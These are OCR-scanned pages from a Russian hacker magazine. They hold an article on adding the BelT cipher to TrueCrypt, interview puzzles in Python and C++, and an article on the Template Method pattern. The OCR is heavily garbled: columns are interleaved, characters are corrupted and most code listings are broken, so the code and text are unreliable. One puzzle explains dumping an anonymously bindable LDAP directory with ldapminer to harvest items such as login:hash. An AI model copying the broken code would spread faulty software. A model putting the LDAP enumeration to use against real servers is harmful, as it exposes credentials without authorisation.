
который недав н о б ы л п риня т в к ачестве

089

04 /159/ 2012

www.epidemz.net


КОДИНГ #define HU4(x,H) ((( unsigned __ int32 ) ( Н)[ U4 ((x)) ])) #define G(x,H,r) RotHi(HU4 ((x),( H)) 1 HU3((x),( H)) \ 1 HU 2((x),( H)) 1 HUl( (x) , (H)),(r))

Буфер:

Сортировка: l сре.а няя а<орость (убыван11е ::=J

15мб Шифро вание

Алгоритм

Макросы

HU применяют блок nодстановкик определенному байту в DWOR D, а макрос G задает одноименное nреобразование из

AES Twofish Serpent

описания шифра . П осле оп р еделения нужных макросов остает-

Ве1Т

ся только запрограммировать схему работы алгоритма !смотри рисунок]. •

void belt_encrypt

Сре.а н ее

161Мб /с

1171~б/с 74.41~6 /с

88.0 Мб /с 75.6 Мб /с 65.5 ""'!<: 63.6 Мб/с 58. 5 Мб/с 51.6 Мб/с 39.4 Мб/с 32.5 Мб/с 33.0 Мб/с

67.7 ""!с 66.8 Мб /с 70.9 Мб/с 52.6 Мб/с 45.8 Мб/с 36. 1 Мб/с 30.8 Мб/с

ГОСТ28147·89

AES·Twofish Serpent·AES T•Nofish·Serpent AES·T•Nofish·Serpent SerpenHwofish -AES

Прототип функции шифрования одного блока имеет вид:

Ра01111фро ...

177Мб /с

Те ст

1691~б /с Закрыть

1021~б/с

75.0 l~б/с 66.6 Мб/с 65.2 Мб/с

Н а скорость BЛIIЯ IOT

б4.7Мб /с

загр у3Ка ЦП

52.1 Мб/с

11

характ е ристию1

4 2 .6Мб/с

устроi1ст в

34.3Мб/с

хра нения

31.9Мб /с

аанных .

(

Э п1 т есты

unsigned __int8 *k s, unsigned __ int8 * inBlock, unsigned __ int8 * outBlock

В ЫЛОЛН RЮТUI

6

О ЗУ.

Результаты бенчмарка

); Реализация данной функции приведена на рисунке. В целом

TrueCrypt

ос тавить возможность использования нашего алгоритма для

программная реализация шифрования одного блока не вызы­

ш и фрования системы в целом. Также объявим констан т у, опреде­

вает проблем - блок делится на четыре значения типа

л я ю щ у ю размер key schedule нашего алгоритма [как помнишь, я

DWORD,

над которыми в течение восьми раундов проводятся операции

с пеци а л ьно сделал так , чтобы о н с о впадал с осно вн ым ключом, то

наложения nодстановки , сдвига , сложения и так далее . И соз­

е с т ь был равен 32 байтам]:

дание программной реализации алгоритма

BeiT

не сложнее

#define BELT_KS 32

программирования известного алгоритма ГОСТ28147-89 . На данном этапе все готово к встраиванию алгоритма в програ мму

ТгuеСг у рt.

МОДИФИКАЦИЯ

Д алее в файле на х одим стр ок у вида #ifdef TC_WINDOWS_BOOT_ SINGLE _MOD E. В данном макросе у казывается максимальный ра змер key shed ul e при компиляции загрузчика, под д ерживающего

TRUECRYPT

Итак, п ервым делом откры вае м в

MSVS 201 О

солюшн с ТгuеСгурt

в с ег о о д и н а л горитм шифрования . В конце макроса д обавляем

и находим пр оек т Сгурtо, который содержит исходные тексты всех

па ру с трок:

алгоритмов шифрования, исполь зуемых в программе. В этот проект мы добавляем файлы с реализованным нами алгоритмом

Be iT.

#elif defined(TC_WINDOWS_BOOT_BELT) #define MAX_EXPANDED_KEY BELT_KS #endif

Да­

лее в любом проекте [например, Mouпt] открываем заголовочный файл Cгypto . h и находим п ере ч исление вида:

enum { NONE AES,

По с ле делаем iпclude заголовочного файла нашей программ­

ной реализации шифра BeiT [#iпc l ude ·· в elt.h'"]. С файлом Cгypto.h

е,

з а к ончено.

Переходим к файлу Сгурtо.с , в котором в первую очере д ь на ­

хо дим объявление массива C i pheгs[] со структурами типа Cipheг.

};

В данный массив добавляем структуру с характеристиками наше­ г о алгоритма - до строки

Это перечисление содержит идентификаторы используемых

«# ifndef TC_WIN ... >>

дел аем встав ку:

кр ипт о гр афических алгоритмов. Д обавим в него иден т ификатор

BELT,

однако сделаем это д о строки « #ifпd ef

АЛГОРИТМ СТБ

{ BELT, '"BelT

чтобы

(СТБ

34.181.31)'" , 16 , 32 , BELT_KS },

34.101.31-2011

Блочны й алгоритм шифрования

34.101.31-2011,

TC_WIN ... >>,

Bei T,

оnисанный в стандарте СТБ

nоявился на с вет относительно недавно, и в настоящий

128

бит разбивается на четыре

момент принят в качестве стандарта в Белор уссии.

32 -б итн ы х значе ния , с которыми и ведется работа . На рисунке буквой

с блоками длиной

К с индексом обозначаются ра ун давые подключи, которых целы х

128

бит и использует ключи

Belt работа ет длиной 128, 192 или 256

Алгоритм сос тоит из восьми ра у ндов, общая схема каждого раунда

представлена на рисун ке. Блок данны х в

бит.

56

ш тук. Вырабатываются раундавые ключи из основного 256-битного

Конструктивно алгоритм слегка напомина е т ГОСТ

ключа

28147-89-

lk[1] , ... , k[8]1

очень прос то:

в обоих случаях раундавые ключи << вводятся >> путем суммирования

no

модулю 2л32 , после чего применяется блок nодстановки !таблицы

K[ l ]=k[ l ), ... , K[ 8]=k [8], K[ 9)=k[ l ),

K[56 ]=k[ 8]

заме ны в ГОСТ! и осуществляется сдвиг результата на некоторо е число позиций в сторону старших разрядов . Однако есть и существенные р азличия: ГОСТ nостроен на основе се ти Ф ейсте ля , а в ко нструкции

то ест ь n утем семикратного ко пирования .

Belt

Отсчет раундов алгоритма ведется с в переменной

применяется SР - сеть . Как видишь , в алгоритме для пр еоб разования информации

i.

Опер а ц ия

G состоит

1,

номер раунда х ранится

из преобразования 32-разрядного

значения при помощ и блока nодстановки Н и циклического сдвига

применяю тся nростые и легко реализ уемые оnерации: сложение по

nолученного значения на определенное число разрядов вл е во . В ц е лом

модулю 2л32 ,

схема алго ритм а довольно про ста для nрограммной реализации.

XOR ,

циклический сдвиг и замена .

ХАКЕР

090

www.epidemz.net

04 / 159/2 01 2


Тгuе-кри пт о в а н ие

belt_encгypt( unsigned

void {

unsignl!d unsigned unsigned unsigned unsigned int i; unsigned unsigned

_int32 а • _int32 Ь • _int32 с "' _int32 d .. _int32 е;

_intB "'ks, unsigned _int8 '" inBlock, unsigned _intB "' outBlock)

(( unsigned (( unsignl!!:d ((unsigned (( unsigned

_int32 *)inBlock)[0]; _int32 *)inBlock)(l]; _int32 *)inBlock)[2]; _int32 •)inBlock)(З];

_int32 tmp; _int32 • kl!y ,. ( unsigned

К еу 2

р

_intзz •)ks;

.

foг (i

"' 0; i<B; ++i)

{ Ь А • G((~

Н, 5); н, 21); " .. ( unsigne:d _int32 )(o - G((b + key{Keyindex[iJ[2]]), Н, 13)); е ,. (G((b + с + k ey(K e yind e x[i][З)]) , н, 21) " ( unsigned _int32 )(i + 1));

+ key{Keylndex[i)(0]]),

с

"• G(( d + key{Key i ndex[ i )[l])),

Ь

+..

Кеу ,

е;

с " ( unsigned _int32 )(c - е); d +• G((c + key[Keyindex[ i ](4}}), Ь "• G((~ + key(Keyindex[i](S))), с "• G((d + key(Keyindex(i](б]]), SWAP(~, Ь, tm.p); SWAP(c, d, tmp); SWAP(b, с, trrp);

(( unsigned (( unsigned (( unsigned (( unsigned

Н, н,

13); 21);

Н,

5);

се

_int32 •)outBlock)[0) • Ь; _int32 •)outBlock}[l) ,. d; _int32 *)outBlock)[2] • ~ ; _int32 •)outBlock)[З) • с;

с

За шифрование в соответствии с алгоритмом

Первым элементом с т рук т уры

Ре жим работы

BeiT

Cipher

является идентификатор

XTS

в стандарте СТБ

34.101.3 1 lп роверка корректной работы алгоритма

алгоритма, далее идет текстовая строка с его названием, т ре-

шифрования], а также путем шифрования блока данных в режиме

тий элемент- размер блока алгоритма в байтах, далее раз-

XTS, nодсчета CRC32

мер ключа и размер

нения значения контрольной суммы с эталоном. В этот раз опять

key shedule соответственно. Далее следует внести коррективы в массив EncryptionAigorithms[] структур EncryptionAigorithm. Данный массив инициализируется по-разному в зависимости от того, определен ли TC_WINDOWS_BOO T, и нам

о т полученно г о шифрованного текста и срав ­

отправляю тебя смотреть исхо дник и на диске, так как в програм ­ мировании механизма самотестирования в действительности нет ничего интересного.

необходимо внести nравки в обе его части. В массив добавляем

ПАРА СЛОВ О ГОСТ28147-89

строку !вторая часть массива изменяется аналогично]:

В чистом виде данный алгоритм добавлять в е

{{ BELT,

},

{XTS,

е,

е,

е },

1}

TrueCrypt

нельзя,

та к как используемая в нем программная реализация режима

XTS В данной структуре первым элемен т ом является список исполь­

пре дпелагает, что алгоритм шифрования работает с блоками

дл иной

128

бит, в то время как длина блока алгоритма ГОСТ-

зуемых алгоритмов !могут использова ть ся несколько алгоритмов

бита. Как ты уже догадался, это приведет к тому, что п оловина

подряд], затем задается режим работы шифра- в данном случае

данных окажется в открытом виде . Е сть вариант ис п ользовать

указываем

ГОСТ два раза, то есть блок в

XTS !описание данного режима работы смотри на

врезке], а последнее значение является индикатором того, устарел

128

бит разбивать на дв а 64 - бит­

ных блока и каждый из них отдельно шифровать п р и помощи

ли алгоритм или нет !устаревшие алгоритмы используются для

ГОСТ, однако данный путь также неприемлем !пре д лагаю тебе

обратной совместимости со старыми версиями TrueCrypt ]. Вт орую

сам о му подумать, почему]. В исходники на диске добавлена поддержка ГОСТ в случае, когд а шифруется по л о в ина блока,

часть массива структур правим аналогичным образом. Далее nереходим к изменению функции

Cipherlnit,

64

которая,

а nоловина - остается незашифрованной. Ясно, что данный

как видно из названия, производит инициализацию ал г оритма

фун кц ионал нельзя исnользовать для защиты ко н фи д енциаль­

шифрования. В ходе работы этой функции осуществляется

ных данных!

schedule

key

шифр а, n оэтому смело добавляем в нее код, о т вечающий

ИСХОДНИКИ Tr ueCrypt

за инициализацию нашего алгоритма:

Л и цензия

налагает неко т орые ограничения на исполь­

зование кода- при его модификации нео бходимо обязательно

case BE LT :

убрать все логотипы с названием

belt_init (key, ks) ; break;

TrueCrypt,

название модифи­

цированной nрограммы не должно содержать строку

а так же должны быть убраны все ссылки на сайт Аналогичным образом модифицируем функции

EncipherB iock

<<truecrypt>>, truecrypt .org lза

исключением окна «О программе»]. В связи с этим, а такж е из

!отвечает за шифрование одного блока открытого текста],

уважения к разработчикам, в исходникахна диске все упоминания

DecipherBiock !отвечает за расшифровку блока]. Кроме того, не­

о TrueCrypt изменены на PlainCrypt, а все ссылки ведут на

обходимо подправить некоторые макросы !смотри в исходниках

loca lh ost/.

на диске], чтобы можно было осущес твлят ь шифрование системы алгоритмом

После внесенных изменений осталось, по сути, сделать три вещи- немного поменять н астройки проектов, добавить поддерж­ ку наших алгоритмов в механизм самотестирова ния

BeiT.

Win7/Vista

версии х64

возникнут проблемы с установкой неподписанных драйверов. Что­

Belt.

а также добавить в ресурсы файлы

Также хочу отметить, что у пользователей

!J..t!QJL

TrueCrypt,

bootloader'a с поддержкой

бы заставить драйверы работать корректно, необходимо подписать их тестовой ЭЦП, а также включить специальный тестовый режим. Подробная ин фа о том, как это сделать, есть как на сайте

Microsoft,

так и в свободном доступе в интернете .

С правкой настроек проектов и ресурсов я предлагаю тебе

справиться самостоятельно или посмотреть, как э то сделано

в исходникахна диске !там нет ничего сложно г о]. Что же касается

НАРРУ

END

Вот, собственно, и все. Теперь, немного напрягшись, ты можешь

механизма самотестирования, то тут проверкаосуществляется

поставить себе на службу отличную шифравалку со своими соб­

двумя способами: при помощи тестовых векторов, определенных

ственными криптографическими ал г ори т мами. I

ХАКЕР

091

04/1 59/ 201 2

www.epidemz.net


КОДИНГ

П авел Ал ександр ови ч (ivinside.Ыogspot.coml

и на н

ПОДБОРКА ИНТЕРЕСНЫХ

Если тебе н а собеседова н ии или интервью попалась интересная

ЗАДАНИЙ, КОТОРЫХ ДАЮТ

задача- смело присылай ее мне,

НА СОБЕСЕДОВАНИЯХ

нашей мале н ькой рубрики.

разберем ее в следую щ их вы п усках

ХАКЕР

092

www.epidemz.net

04/159/2012


Задачи на собеседованиях

УСЛОВИЕ

>>> myappend( ** a)

Напиши функцию, которая будет пол учать на вход два сп и ска и воз вр а щать словарь, в котором ключи- эле менты первого списка,

а значе ния- эле м е нты второго спис ка или

None, есл и соответ­

РЕШЕНИЕ При выполнении программы будет такой вывод:

ствую щий элеме нт отсутствует.

[ 1 , 2 , 3,

»> »>

а

;

[ "а" , "Ь" , "с" ]

ь ; [ 1, 2 ] >>> print dictify(a,b) { "а" :

1,

"Ь" :

2,

"с" :

е]

(е] [е,

е]

В первом случае функция о тр абатывае т в самом обычном режи·

None}

ме и к списку

РЕШЕНИЕ

[1, 2, 3}

просто добавляется новый элемент.

Во втором случае, так как параметров при вызове не задано,

используется nараметр по умолчанию и создается новый объект

Мое первоначальное решение выглядело так:

-пустой сnисок «а», к которому добавляется новый элемент О. В

def dictify(a, Ь): # возвращае м пустой # чем к л ючей i f len(b) > len(a): return {}

третьей строчке снова параметр не задан и используется список, с лова р ь ,

если

э л ементов боль ш е,

созданный при втором вызове функции myappend [J, так как с nи ­ сок- изменяемый объект.

Далее при вызове myappend[*al возникнет исключение: AttгibuteEггoг: ' int' object has по attгibute 'append', потому Ч то функции передается словарь со значениями, а вышеприве д енный

# ко н стру ир уем с л оварь с помощью встроенных # фу н к ци й zi p и di ct dic ; dict(zip(a, Ь)) # до nолняем с ло ва р ь пус тьм и эл ементами, если таковые i f len(b) < len(a): for i in xrange(len(b), len(a)) : dic(a(i]] ; None return di c

сnособ nодразумевает передачу с nи ска . В этом случае правильно было бы сде лать т ак: имеются

а

; [[ 1 , 2 ], 3 ]

myappend( *a) # что эквивалентно такому # myappend(( 1, 2], 3)

в ы зову:

При вызове mya ppend [**al тоже воз ни к н ет исключение, но н е­ Стоит отметить, что в Pythoп в е р с ии м енее

2.2

е ще не существо ­

сколько другое: Тур е Е г г ог: myappe nd[J k eywoгds must Ье stгings . В

вало конструктора dict, и с писки превращ а ли сь в слова ри только с

этом случае должен передаваться словар ь и м енованных аргумен­

помощью цикла fог:

тов, что, в обще м-т о, и д елается, но с ошибкой: названия ключей словаря должны соответствовать названиям аргументов, то есть

корректный вызов будет выглядеть так :

keys ; [ 'а' , 'Ь' , 'с' ] vals ; [ 1, 2, 3] dic ; {} for (k, v) in zip(keys, vals) dic[k] ; v Тогда я забыл про о дну родственную и более старую встрое нн ую

а ; { 'а ' : [ 1, 2 ], 'num' : 3} myappend(**a) # что эквивал е нтно такому # myappend((1, 2] , 3)

в ы зову:

функцию map, которая применяет заданную функцию к каждому элементу п осле д ователь но с ти. Н о если вместо функ ции ей пере­

УСЛОВИЕ

дать N опе, то она пр ос то объе диня ет элементы подобно zip, при

Напиши класс, который х р анит сnисок своих экземп ляр ов и поз во·

этом автомати ч ески запо лняя отсутствующие з нач е ния с л ова ря

ляет итегрировать по ним.

Nопе. В итоге решение з адачки еще больше упрост ило сь:

>>>

а

»>

Ь

; Keeper() ; Keeper() >>> for i in Keeper.list _ in sta nc es() : print i <Keepe r instance at ех ...

def dictify(a, Ь): i f len(b) > len(a): return {} dic ; dic t(map( None, а, Ь)) return dic

РЕШЕНИЕ УСЛОВИЕ

Для решения этой задачки нужно зна ть про такой шаблон

Есть такая функция:

проектирования как декоратор и уметь его nрименять в языке

Python. Вообще говоря, в питоне декоратор- это функция, которая def myappend(a ; [ ] , num a.append(num) print а

применяется к др угой функции для расширения или изменения ее

е) :

поведения. Синтаксис дек ораторов является попросту синтаксиче­ ским сахаром:

Что будет п ро и схо дить при выполнении следующего кода и

def f( ... ):

почему:

f ; stat icmethod(f )

»> а ; ( 1, 2, 3] » > myappend (а) » > myappend () » > myappend () »> а ; {1 : 2, 3 : 4 } >>> myappend( *a )

ХАКЕР

@staticmethod def f( .. . ):

В этом примере как раз-таки и nоказано применение нужного

093

04/159/2012

www.epidemz.net


КОДИНГ

нам декоратора-

staticmethod,

РЕШЕНИЕ

к оторый превращает обыч н ый

метод класса в статический, то есть теперь этот метод можно

Эта строчка, как ты уже догадался, из результата сканирования

вызывать напрямую, без создания экземпляра класса. В оспол ь зу­

емся им при решении за д ачи [список экзе м пляров буд ем хра н ить в

nmap. Она сообщает, что на сканируемой машине открыт !ер-порт 389, на котором расположился LDAP-cepвep . Слова «Anonymous

переменной

Ьind ОК >> как бы намекают нам, что он не простой, а с возмож­

instancesl:

ностью анонимного подключения к LDАР-каталогу, то есть без

class Keeper: in stances = [] def _ init_(se lf ) : self.in stances.append (self ) @staticmethod def list_in stan ces(): return Keeper.instanc es

знания пользовательского

Ke eper () Kee per() for i in Kee pe r . li st_in st ance s(): print i

ldapminer -h <iр_а д рес> <оп ци и> -р [port ]: п о умолч а ни ю ра в е н 389 - в [bind ]: имя п ользователя -w [passwo rd] : п араль -Ь [base se arc h]: п оиск по п ользова т е л ю , - d [du mp all ] : получит ~ всю и н фо рма ци ю

DN

и пароля.

Мы этим непременно воспользуемся и попытаемся получить оттуда информацию, среди которой могут быть всякие интересные штуки типа

login:hash,

но в общем случае там может находиться что

уго дно. Для этого существуют специальные программы.

1. ldapminer. Его синтаксис:

а = Ь =

__ iпit __ , которая выполняется при соз д ании экзем­ пляра класса, к списку instances д обавляется ссылка на наш све­ жесозданный объект, а функция list_instances возвращает список, В функции

2. luma. Утилита с графическим

который по умолчанию поддерживает итерационный протокол.

интерфейсом, весьма проста в

освоении.

Вывод nрограммы будет примерно такой:

3. ldp. Еще одна

графическая утилита, на этот раз от

4. openldap. Набор консольных ути лит для

<_main __ .Keeper in stance at <__ m a iп __ .Keepe r in stance at

гр у пп е

Microsoft.

взаимодействия с

0 хЫ 2а еd4с>

LDАР-каталогами. Конкретно в нашем случае нужно использо­

0 х Ы 2 а ее2с>

вать ldapseaгch. Синтакси с приводитьздесь не буду, он очень уж страшный.

УСЛОВИЕ Как ни странно, во всеми любимом

Что ЭТО И ЧТО С ЭТИМ М ОЖ Н О с д е л ать?

Metasploit до

сих пор нет

модуля для дампа LDАР-каталога, хотя реквест о такой функции

389/t cp open

ldap

(Anonymous bind

был подан около двух лет назад. :Н:

ОК )

В СЛЕДУЮЩЕМ ВЫПУСКЕ 1.

Что будет выведено в результате исполнения программы? Почему?

class А: def __ i nit __ (s elf, name): self . name = name def __de l __ ( self) : print se lf . name,

class Bar: Foo puЬlic :

Bar( int j } { i= new char [ j]; { delete i; } private : cha r * i; -ваr()

}; [A(str( i )) for i in r ange( 3)] for а in аа: del а аа =

void main() Foo* f= new Foo( 100 }; Foo* b= new Bar( 200 }; *f= *b; delete f; delete Ь;

print ' done' # •.•

2.

Перечисли все п робле мы, кото р ые ты ви д иш ь в д а нн ом ко д е:

class Foo

3.

У тебя есть файл [например, access -лo гweb-cepвepal очень большо г о размера. П ользователи часто запрашивают из него строчки по их

puЫic :

номеру. Нужно реализовать функцию, которая бы возвращала строчку

Foo( int j} { i= new int [ j]; - Foo() { delete i; } private : int * i ;

с произвольным номером за время, независимое от номера строчки и

};

размера файла.

4.

Напиши функцию сортировки массива чисел. Если знаешь несколько способов- используй наиболее быстрый из известныхтебе алгорит­ мов.

ХАКЕР

www.epidemz.net

04/159/2012


ПРОДУКТЬI СО ВСЕГО МИРА*

OT&OPHbiE

Мы з нае м , где в мире н айти сам ы е л уч ши е п родукты . Вы зн ае те , что можете н ай ти и х рядом , п од маркой

www.epidemz.net

TASH


ИНКАПСУЛЯЦИЯ АЛГОРИТМОВ

В

прошлей статье про паттерны << Фасад» и << Адаптер » мы

представили, что работаем над парсером, который со-

бирает инф у с определенных сайтов. Сегодня мы будем продолжать нашу воображаемую работу, что позволит нам

вникнуть в суть другого паттерна объектно-ориентированного программирования под назва н ием << Ш аблонный метод>>. Кон кре тизируем область применения нашей мегатулзы:

она будет ска нить всяческие доски объявлений и форумы. Как

Алгоритмы- это, пожалуй, самое важное в мире кодинга. Любая программа р е ализует какую -то последовательность д ейс тви й

и в большинстве случаев не одну. В ООП алгоритмы имеют такую же значимость, как

и в любом другом виде кодинга , поэтому гуру

объектов и классов придумали специальный патте рн, который позволяет сделать

структура построения интерфейса схожа. На одной странице отображается строго за данно е количество топиков- скажем, тридцать. Если тем в разделе форума больше, чем тридцать, то п ользова т елю показывае т ся навигацио н н ы й элемент,- напри­

мер, ссы л ка на следующую с т раницу или п ронумерованный спи­ сок этих страниц. Таким образом, наш парсер долже н не только проходить по первой странице, но и уметь бегать по соседним,

также со д ержащим нужную нам информацию. Вырисовывает ся вполн е конкретный алгоритм действий: парсер получает адрес страни цы, скачивает ее, выдирает

нужные топики/объявления, ищет адрес следующей страни-

исполь з ование алгоритмов более легким, понятным и гибким .

известно, html-кoд у разных форумных движков разный, но

цы и если его находит, то начинает все сначала . В противном случае, если мы не нашли ссылку на следующую страницу,

парсер зака н чивает свою работу. В коде все это будет выглядеть

www.epidemz.net


Алгоритм

работы

11 .. .

парсера

doSomethingQ;

class Parser

11 ... PrimitiveOperationlQ;

11

PrimltiveOperationlQ

11 .. .

puЫic :

Primitive0peration2Q

PrimitiveOperationlQ;

11 ...

void parsePage(string url)

em plateMethodQ

doAbso lute lyThisQ;

{

11 ...

while ( url ! = "" )

11

полу ч аем

нужные данные

doAbsolutelyThisQ

со с т раницы

getTopicText();

11

ищем

url

=

ссылку

н;~

следующую стр;~ницу

get NextUrl();

private : void ge tTopicText() { Р rim itiveOperation

11 ... get Next Url()

stri п g

10

PrimitiveOperation2Q

{

doSomethingQ

11 ... Ди а гр амма классов п а тт е рн а « Шаблонный м ето д »

У нас есть класс Ра гsег, который имеет основной метод

void getDataO nPag e()

paгsePagell. Этот метод будут вызывать клиенты парсера.

{

Сам paгsePagell реализует алгоритм, описанный выше. Дл я

11 ...

удоб ств а восприятия мы разбили код метода на функции, такие

как get N extUгlll и getTopicTex tll . Н екоторые могут сказать, что

string get Next Url()

лишние вызовы замедляют работу программы, но, во-первых,

{

зто всего лишь п се вдокод !грубо гово р я, блок-схема буквами!,

11 ...

а во-вторых, такое разбиение нам пригодится в будущем.

ПАРСИМ НЕСКОЛЬКО САЙТОВ Наш парсер работает, и все вроде хорошо, но мы не учли о дну

Как видишь, у нас ес ть все тот же метод paгsePagell, который

мале нькую деталь- сайт для сбора информ ации у нас не один,

выполняет основную работу . Так как мы знаем, что так ое на­

их несколько . Это нас, правда, не с ильно расстроило, и мы при­

следование, полиморфизм и пр очее, то решаем все это круто

нял и сь ваять еще один к л асс.

оптимизировать, создав обще го родителя для двух классов пар­

Так как алгоритм, описанный на ми ранее, остался прежним,

серов. Теперь вся наша конструкция выглядит примерно так:

а изменили сь лишь д ета л и реализации,- например, получение ссылки на следую щую с траницу,- то код нашего нового класса

И ерархи я

буде т очень похож на тот, что был в пре дыд ущем.

class BasePa r ser

Па рс е р для

е ще

одного

к лассов

пар е еров

11

сайта

class Par se r5ite2

puЬlic :

virtual void parsePage(string url)

е;

11 puЫic :

void pa rse Page(s tring url)

class ParserSit e l:

puЫic

Ba se Par se r

{

while (url != "" )

puЫic :

void par se Pa ge(s tring url)

11

получаем ну ж ные данные

со

с тр а ницы

while (ur l != "" )

getDataOпPage();

11 url

и щем

=

ссылк у

на

с леду ющу ю

11

с траницу

getNextUrl();

11 url private :

11

ме тод п о

} на з н ач ению ид е нт иче н

Parser : : getTo pi cTe xt

п о л учаем

н уж н ые д а нны е

со ст р а ницы

getTopi cText( );

private :

www.epidemz.net

ищем ссылку

=

на

сле д ующую с т ран иц у

getNextUrl();


",. An IJЬ.st.r~Ct CltJS$ t.h«t i 6 COI'UoiOn to SCVC~"til. g4PtCS in ,",. •lhich playe.t.-.t' р~ау againsot the othe.r.i' , Ьut only one i.t' ",. playJ.Лg at а g~ven t.з..тв .

реализацию на потомков, пометив его как абстрактный . Такой

•1

ход, конечно, внеснекоторый порядок в нашу программу, но

a:ь~tra.ot

Мы сделали paгsePage базовым методом, но переложили

осталась проблема дублирования кода. Реализация процесса

c1as!i Game i

сбора информации очень похожа, а учитывая то, что мы ввели proteote d int

р

le.yersCo unt ;

такие методы как getNextUгlll и тому подобные, мы получаем

вообще идентичный набор символов в теле paгsePagell.

ahstraot void 1nlt.1aliz:Game t );

ПАТТЕРН « ШАБЛОННЫЙ МЕТОД »

ahstr act void make-Play int player );

П аттерн « Шаблонный метод>> призван икапсулировать в себе

ahs:traot 1Joo1ean endOfGame (, :

ahstraot voicl

/*

А

pr i нtUin11er

выполнениенекоторого алгоритма. Мы уже частично реализо­

( 1;

вали его, выделив базовый класс для наших парсеров. Следую­ щим шагом будет непосредственно инкапсуляция. Для этого

·1

ce.-nplacc m~chod :

:fina.l. voicl playOneGarue ' int player.:5 Count ) t Jt is. р Leye[' !I C oнn t 1n1t.1S l lzeGarne ():

1

мы перенесем код метода paгsePagell из дочерних классов

playe: c !ICo un t ;

Paгse г Sitel и PaгseгSite2 в родительский ВаsеРагsег. Благода­

int J

whi1c

( endOfGame

О)

t11a ke:P lay ( j ); J -= ( J + ... )

ря тому, что мы уже выделили в отдельные функции некоторые

{

части алгоритма [таки е как получение текста объявления или

поиск ссылки на следую щ ую страницу форума[, то мы немного

playerэCount ;

упростили процесс применения паттерна. Если бы изначально

printtJi nt1er (),

весь код paгsePage был построен без вызова дополнительных

/ 'Now w~ Cdr. ,.-xl.tm(l ol.aвs

t~1is

t 1C'1.s.-<

ordt!l"

t.c• lmplf'>lltf'!иt..

rict;;dl

Monopo!y extends Ga1t1e

/* Impl.ementdt-.l"n

с~

Патт ер н

« Шаблонный

метод•

class BaseParser

necessa.ry conc.reta metJ;ods ,..,

11

void lnitia!izeGe.me J / ' Iza.

.

методов, то нам все равно пришлось бы их писать.

fJdl.'f"!S .

puЬlic :

~ idl..o.~c: топе: у

void parsePage(string url) {

Пример кода паттерна « Шаблонный метод н

while (url !; "" )

void getTopicTex t ()

11 получаем нужные getTopicText ();

{

данные

со

страницы

11 . . 11

ищем ссылку

на

следующую страницу

url ; getNext Url() ;

string get Next Url() {

11 . .

class Parser5ite2:

puЫic

protected : /1 эти части алгоритма должны virtual void getTopicText() virtual string getNextUrl() ;

BaseParser

определить

наследники

е; е;

puЫic :

class ParserSite l:

void parsePage(string url) while (url !; "" ) данные

со

/1 ищем ссылку на следующую url ; getNextUrl();

страницы

страницу

/1

Мы

11

так

/1

функции,

которые

позволяют

/1

специфичныечасти

алгоритма

не

должны

как

изменять метод

базовый

класс

parsePage,

предоставил

для

реализации

нам специальные

реализовать

// void parsePage(string url); protected : /1 эти два метода перео п ределяются //

private : void getTopic Text()

BaseParser

puЫic :

{

/1 получаем нуж н ые getTopic Text();

puЬlic

в субклассе

специфичного для данного

парсера

кода

void getTopicText() {

{

11 . .

11 . . string getNextUrl()

str ing getNextUrl()

{

{

11 ..

11 . .

www.epidemz.net

. .


.ass Par se rSit e2:

puЬlic

Base Parser остановится преждевремен но. Метод должен определяться

/1

структура

класса

ид е н т ичн а

структуре

как виртуальный, чтобы в функции алгоритма базо в ого к л а сса

Par se rSitel

вызывались методы, переопределяемые в дочерних [есл и они переопределяются]. По умолчанию перехватчик возвращает Если взглянуть на код иерархии классов парсеро в, к которому при­ !Нен наш паттер н, то можно увидеть, что в базовый класс также вы­

сены методы getNextUгl ll и getTopicText[] . По умолчанию они имеют

Fals e, тем самым никак не влияя на количество итераций. Н о потомки ВаsеРагsег могут переопределить код перехватчика и тем самым повлиять на ход алгоритма.

стую реализацию, поэтому дочерние классы должны опр еделить,

кой код там будет. Но в общем случае << Ша блонный метод >> допуска­

Ко н троль

некий базовый функционал в подобных функциях, таким об ра зом

class ParserSitel:

к оличес т в а

обработанны х puЬlic

страниц

BaseParser

нкретные реализации парсера могут воспользоваться уже готовым

11

дом.

Т еперь контроль за исполнением алгоритма сосредоточен вру-

х одного единственного класса- Ваs е Раг sег. Его наследники •гут лишь менять детали реализации э т о г о алгоритма, которые

рога определен ы в базовом классе. Что нам это дает? Н у, пред­

авим, что парсить нам надо не о ди н-два сайта, а сразу сотню . И в

protected :

/1 используем перехватчик / 1 т о есть не вмеwиваемся /1 bool stop Hook();

по умолчанию ,

в

работу цикла

кой-то момент мы решаем за м е н ить итера ц ионный алгоритм на курсивный. С паттерном << Ш аблонный метод>> нам д остаточно из­

нить код всего в одно м месте - BasePaгseг::paгsePage[]. Е сли бы

class ParserSite2:

puЫic

BaseParser

вететвеннесть за реализацию основной последовательнос ти дей­ вий лежала на отдельных к л ассах-парсерах, то нам бы пришлось релопатить тонны исход н иков, прежде чем получим желаемый

11 ..

зультат.

private : int count;

ЕРЕ Х ВАТЧИКИ :сткий контроль алгорит ма- э т о хорошо, но что если нам нужно

остранство для маневра? Е с ли в п оследова т ельности действий

protected :

едусмотрено некоторое ветвление, на которое влияют детали реа­

11

зации, то нам потребуются методы-перехватчики [хуки].

bool st op Hook()

До пустим, класс P aгseг5ite1 должен просматривать все страницы

пе р е оnр е деля е м п ерех ватчик

{

рума, а вот Paг se г5 ite2 всего- нав сего первые три . Получается, что ждая конкретная реализация парсера влияет на одно из фундамен­

if ( co un t > 3 )

lьных свойс тв алгоритма- работу цикла. Очевидно, что нам надо

return true ; else return false ;

~-то контро лировать ко ли чес тв о итераций, чтобы Paгseг5ite2 оста­ вился в нужный момент. Н оневозможность изменения поведения

-sePage не дает нам это с д елать. Хуки же позволяют влиять на ход алгоритма и при этом сохранять ;траль над ним в базовом классе. Н емного изменив код метода

11

-sePage[] мы позволим потомкам преждевременно останавливать кл while. Давай взглянем н а код.

void getTopi cT ext() {

тут увеличив аем с ч етч и к отпарсенных с траниц

11 .. . J ехва тчик эss

в

count++;

« Шаблонном методе •

Base Pars er

1/ Мы видим, что Paгse5 ite1 не перегружает хук, и paгsePage

Jlic : void par se Page(string url) { while (url != "" )

nользуется дефолтным вариан т ом. А вот Paгse5ite2 в едет подсчет количества обработанных страниц, и когда их число д остигает трех, перехватчик останавл ив ает цикл.

Если бы в nаттерне << Шаблонный метод>> не было хуков, нам пришло сь бы nереписывать реализацию paгse P age для каждого

11

с

помощью хука

мож н о досрочно завершить

цикл

отдельного класса napcepa, вследствие чего пропал бы прак­ тически весь смысл его использования, так как мы nотеряли б ы

i f (stopHook()) break ;

контроль над алгоритмом.

ЗАКЛЮЧ Е НИ Е

11 . . .
